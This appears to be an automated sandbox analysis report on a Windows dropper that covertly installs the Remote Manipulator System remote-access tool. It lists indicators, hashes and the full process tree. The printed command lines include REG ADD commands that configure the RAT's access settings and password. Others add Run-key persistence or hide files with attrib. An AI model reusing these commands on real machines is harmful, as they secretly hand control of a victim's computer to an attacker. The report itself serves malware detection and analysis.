Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2022 22:17
Behavioral task
behavioral1
Sample
9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
Resource
win7-20221111-en
General
-
Target
9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
-
Size
4.0MB
-
MD5
c613714d39e2b2bcb8c5d7a6036145ef
-
SHA1
3eef6909f3f8367cc8336f7af00704cf662d6546
-
SHA256
9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e
-
SHA512
af61bf7d26f2ed448042f56ce9d597e1289a535c4266ef713b0bc348467a602ec06dbc25b494dd056eacee22567687fce1417d1dc22ec27ada46009f818569cf
-
SSDEEP
98304:MeRrH4bOQgJ0PT+kab/bjoecLdvetq0WoNVs/7eiKo8:MeRrHLxJiT+kaLZostq0WoNweiKo8
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 3664 created 3380 3664 svchost.exe rutserv.exe -
Executes dropped EXE 4 IoCs
Processes:
hide.exerutserv.exerutserv.exerfusclient.exepid process 2224 hide.exe 3380 rutserv.exe 1236 rutserv.exe 3748 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Processes:
resource yara_rule behavioral2/memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmp upx C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe upx C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe upx behavioral2/memory/3248-158-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uac = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\hide.exe" reg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3932 taskkill.exe 1332 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
rutserv.exerutserv.exepid process 3380 rutserv.exe 3380 rutserv.exe 3380 rutserv.exe 3380 rutserv.exe 1236 rutserv.exe 1236 rutserv.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
taskkill.exetaskkill.exerutserv.exesvchost.exerutserv.exedescription pid process Token: SeDebugPrivilege 3932 taskkill.exe Token: SeDebugPrivilege 1332 taskkill.exe Token: SeDebugPrivilege 3380 rutserv.exe Token: SeTcbPrivilege 3664 svchost.exe Token: SeTcbPrivilege 3664 svchost.exe Token: SeTakeOwnershipPrivilege 1236 rutserv.exe Token: SeTcbPrivilege 1236 rutserv.exe Token: SeTcbPrivilege 1236 rutserv.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
hide.exepid process 2224 hide.exe 2224 hide.exe 2224 hide.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
hide.exepid process 2224 hide.exe 2224 hide.exe 2224 hide.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
rutserv.exerutserv.exepid process 3380 rutserv.exe 1236 rutserv.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.execmd.exehide.exesvchost.exerutserv.exedescription pid process target process PID 3248 wrote to memory of 444 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 3248 wrote to memory of 444 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 3248 wrote to memory of 444 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 444 wrote to memory of 3932 444 cmd.exe taskkill.exe PID 444 wrote to memory of 3932 444 cmd.exe taskkill.exe PID 444 wrote to memory of 3932 444 cmd.exe taskkill.exe PID 444 wrote to memory of 1332 444 cmd.exe taskkill.exe PID 444 wrote to memory of 1332 444 cmd.exe taskkill.exe PID 444 wrote to memory of 1332 444 cmd.exe taskkill.exe PID 444 wrote to memory of 5108 444 cmd.exe reg.exe PID 444 wrote to memory of 5108 444 cmd.exe reg.exe PID 444 wrote to memory of 5108 444 cmd.exe reg.exe PID 444 wrote to memory of 4360 444 cmd.exe reg.exe PID 444 wrote to memory of 4360 444 cmd.exe reg.exe PID 444 wrote to memory of 4360 444 cmd.exe reg.exe PID 444 wrote to memory of 4992 444 cmd.exe reg.exe PID 444 wrote to memory of 4992 444 cmd.exe reg.exe PID 444 wrote to memory of 4992 444 cmd.exe reg.exe PID 444 wrote to memory of 4068 444 cmd.exe reg.exe PID 444 wrote to memory of 4068 444 cmd.exe reg.exe PID 444 wrote to memory of 4068 444 cmd.exe reg.exe PID 444 wrote to memory of 308 444 cmd.exe reg.exe PID 444 wrote to memory of 308 444 cmd.exe reg.exe PID 444 wrote to memory of 308 444 cmd.exe reg.exe PID 444 wrote to memory of 4652 444 cmd.exe reg.exe PID 444 wrote to memory of 4652 444 cmd.exe reg.exe PID 444 wrote to memory of 4652 444 cmd.exe reg.exe PID 444 wrote to memory of 3464 444 cmd.exe reg.exe PID 444 wrote to memory of 3464 444 cmd.exe reg.exe PID 444 wrote to memory of 3464 444 cmd.exe reg.exe PID 444 wrote to memory of 3836 444 cmd.exe reg.exe PID 444 wrote to memory of 3836 444 cmd.exe reg.exe PID 444 wrote to memory of 3836 444 cmd.exe reg.exe PID 444 wrote to memory of 2228 444 cmd.exe reg.exe PID 444 wrote to memory of 2228 444 cmd.exe reg.exe PID 444 wrote to memory of 2228 444 cmd.exe reg.exe PID 444 wrote to memory of 2224 444 cmd.exe hide.exe PID 444 wrote to memory of 2224 444 cmd.exe hide.exe PID 444 wrote to memory of 2224 444 cmd.exe hide.exe PID 444 wrote to memory of 4716 444 cmd.exe attrib.exe PID 444 wrote to memory of 4716 444 cmd.exe attrib.exe PID 444 wrote to memory of 4716 444 cmd.exe attrib.exe PID 3248 wrote to memory of 1212 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 3248 wrote to memory of 1212 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 3248 wrote to memory of 1212 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe cmd.exe PID 2224 wrote to memory of 3380 2224 hide.exe rutserv.exe PID 2224 wrote to memory of 3380 2224 hide.exe rutserv.exe PID 2224 wrote to memory of 3380 2224 hide.exe rutserv.exe PID 3664 wrote to memory of 1236 3664 svchost.exe rutserv.exe PID 3664 wrote to memory of 1236 3664 svchost.exe rutserv.exe PID 3664 wrote to memory of 1236 3664 svchost.exe rutserv.exe PID 1236 wrote to memory of 3748 1236 rutserv.exe rfusclient.exe PID 1236 wrote to memory of 3748 1236 rutserv.exe rfusclient.exe PID 1236 wrote to memory of 3748 1236 rutserv.exe rfusclient.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe"C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\install.cmd" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c0c50617373776f726444617461060c364f6d2b75675147394b493d084869646553746f70090c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323033342e37373133373636373832084c6963656e73657306ba524d532d462d36423764666137333434354538394333393762653062623966423866433637666269593253326459586c52664477776e493233696f4f4743346f44686a584b647a4134585246344d44463145624373685631304e48313545447777374b57304241414d484151514e487a7370625135635251344141687741616d426841676b4362774d454377566d64324d4c424235555267344e557a773562514945486c4e635241384d6653593253326459586c526644773d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a0a4164646974696f6e616c0604353535351144697361626c65496e7465726e65744964080b536166654d6f64655365740800003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e00750073002e006b00650079004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00310034004100430031004200430038002d0041004300420036002d0034003100370043002d0038003400410045002d004300320039004400360032003200450044003300430042007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360030003000300034003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a003⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v uac2 /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "uac" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exerutserv.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exeC:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exeC:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Roaming\Microsoft\*.*"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmdFilesize
300B
MD537fb6f29c7eadc5015cc1d3de40bda6c
SHA1559517b0545c2d57d85a62cddb5a9c156ac5d808
SHA256885bd0a9ca439ab47b456243a7feddb40b6900eb7fe591dad018fb46d89d64f9
SHA512a0c7f7cde083096b154441a0f4197e7162203a52a65e00ded63108a76197ce86efcfb6d986ce5c9e954eefb967af358b9969dabea082fe967d2bdac8162a0af0
-
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exeFilesize
366KB
MD5625853e2048849b0ecd47bd6cfd6a705
SHA1a9382760732e95d9be675b5494a1a29f55853a73
SHA25653c22abdc57b3d91d474b29ea98a7ad79eb991591b697aa8c2b1214548bd62f8
SHA512713f96a69569d1ed6f794772c0ccd314ef16429c48b13c63f9560c08d8ac57ea73c3ead0677c8886dcc86e55f19d72d2b116ecfa0766aaabe6e6d78db42c81fb
-
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exeFilesize
366KB
MD5625853e2048849b0ecd47bd6cfd6a705
SHA1a9382760732e95d9be675b5494a1a29f55853a73
SHA25653c22abdc57b3d91d474b29ea98a7ad79eb991591b697aa8c2b1214548bd62f8
SHA512713f96a69569d1ed6f794772c0ccd314ef16429c48b13c63f9560c08d8ac57ea73c3ead0677c8886dcc86e55f19d72d2b116ecfa0766aaabe6e6d78db42c81fb
-
C:\Users\Admin\AppData\Roaming\Microsoft\install.cmdFilesize
10KB
MD5294c12aea77808afd52e3e355831eaf3
SHA1f152d3ccfa5b9ed27c158ba98990da6ac238238d
SHA256fd27eafba3d87daf5251e707631322812d24a9b03c72ad0262ab8fc3d8308fc4
SHA512ddd8ce6efa46d27d7374403b0ba6f6405d2cfc9c47c2e9d3c22c62d1c227ea989d11c0232ac19fbab83f765d5f641b784ae30c43398e5fc56ab0c5fb8fe9ddce
-
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exeFilesize
6.1MB
MD575c2572ab3afad8f4f462c3221be14f4
SHA18429b630a9113fa1d07b27cc494429adb7f77aa0
SHA256f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92
SHA51203f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exeFilesize
6.1MB
MD575c2572ab3afad8f4f462c3221be14f4
SHA18429b630a9113fa1d07b27cc494429adb7f77aa0
SHA256f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92
SHA51203f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exeFilesize
6.1MB
MD575c2572ab3afad8f4f462c3221be14f4
SHA18429b630a9113fa1d07b27cc494429adb7f77aa0
SHA256f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92
SHA51203f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\vp8decoder.dllFilesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
C:\Users\Admin\AppData\Roaming\Microsoft\vp8encoder.dllFilesize
238KB
MD5200cba4b9cbdd64f1a281b89cd1467f3
SHA1fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA51215a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
-
C:\Users\Admin\AppData\Roaming\Microsoft\webmmux.dllFilesize
90KB
MD5aa78ed008f72533c7136bf6d4bddb0d0
SHA12e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA25641e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
-
C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisdecoder.dllFilesize
141KB
MD50867a260483876336a727cf9f2928b13
SHA13c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
-
C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisencoder.dllFilesize
202KB
MD543adc4acd56c56b0a25664954c7aa80c
SHA1d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA2560e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
-
memory/308-141-0x0000000000000000-mapping.dmp
-
memory/444-133-0x0000000000000000-mapping.dmp
-
memory/1212-157-0x0000000000000000-mapping.dmp
-
memory/1236-163-0x0000000000000000-mapping.dmp
-
memory/1332-136-0x0000000000000000-mapping.dmp
-
memory/2224-147-0x0000000000000000-mapping.dmp
-
memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmpFilesize
932KB
-
memory/2228-145-0x0000000000000000-mapping.dmp
-
memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/3248-158-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/3380-160-0x0000000000000000-mapping.dmp
-
memory/3464-143-0x0000000000000000-mapping.dmp
-
memory/3748-165-0x0000000000000000-mapping.dmp
-
memory/3748-167-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/3748-168-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/3836-144-0x0000000000000000-mapping.dmp
-
memory/3932-135-0x0000000000000000-mapping.dmp
-
memory/4068-140-0x0000000000000000-mapping.dmp
-
memory/4360-138-0x0000000000000000-mapping.dmp
-
memory/4652-142-0x0000000000000000-mapping.dmp
-
memory/4716-149-0x0000000000000000-mapping.dmp
-
memory/4992-139-0x0000000000000000-mapping.dmp
-
memory/5108-137-0x0000000000000000-mapping.dmp